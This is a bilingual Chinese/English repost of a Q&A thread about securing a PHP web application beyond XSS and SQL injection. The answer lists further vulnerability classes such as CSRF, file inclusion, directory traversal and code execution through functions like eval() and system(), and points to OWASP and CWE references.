除XSS和Sql注入外,我还可以保护我的网站吗? [英] Ways I can protect my site excluding XSS and Sql injection?
问题描述
因此,我网站的成员可以发布主题,回复,评论,对其进行编辑等.我始终对HTML输入使用htmlspecialchars和addslashes来保护我的站点免受XSS和SQL注入攻击.够了还是我想念的更多吗?
谢谢.
So, members of my website can post topics, replies, comments, edit them and so on. I always use htmlspecialchars and addslashes for html inputs to protect my site against XSS and SQL injection attacks. Is it enough or is there something more I miss?
Thanks.
推荐答案
Web应用程序可能会出错.除了XSS和SQLi,还有:
There is a lot that can go wrong with a web application. Other than XSS and SQLi, there is:
- CSRF-跨站点请求伪造
- LFI/RFI-由
include(),require()... 引起的本地文件包含/远程文件包含
- 在
mail()中进行CRLF注射
- 全局变量命名空间通常由
register_globals,extract(),import_request_variables()引起
- 遍历目录:
fopen(),file_get_contents(),file_put_conents() - 使用
eval()或preg_replace()和/e的远程代码执行 - 具有
passthru(),exec(),system()和`` 的远程代码执行
- CSRF - Cross Site Request Forgery
- LFI/RFI - Local File Include/Remote File Include caused by
include(),require()... - CRLF injection in
mail() - Global Variable Namespace Poising commonly caused by
register_globals,extract(),import_request_variables() - Directory Traversal:
fopen(),file_get_contents(),file_put_conents() - Remote Code Execution with
eval()orpreg_replace()with/e - Remote Code Execution with
passthru(),exec(),system()and ``
关于损坏的身份验证和会话管理,存在一整套漏洞每个Web应用程序程序员必须 OWASP排名前10 的一部分/strong>阅读.
There is a whole family of vulnerabilities regarding Broken Authentication and Session Management which is apart of the OWASP Top 10 that every web app programmer must read.
《猩红色的研究》 是一本很好的黑皮书,涵盖了许多这些方面我列出的漏洞.
A Study In Scarlet is a good black paper that goes over many of these vulnerabilities that I have listed.
但是,在 Wordpress .关于什么是漏洞的绝对权威是 CWE系统,它对 HUNDREDS 进行了分类漏洞,其中许多漏洞都可能影响Web应用程序.
However, there are also strange vulnerabilities like this one in Wordpress. The definitive authority on what is a vulnerability is the CWE system which classifies HUNDREDS of vulnerabilities, many of which can affect web applications.
这篇关于除XSS和Sql注入外,我还可以保护我的网站吗?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
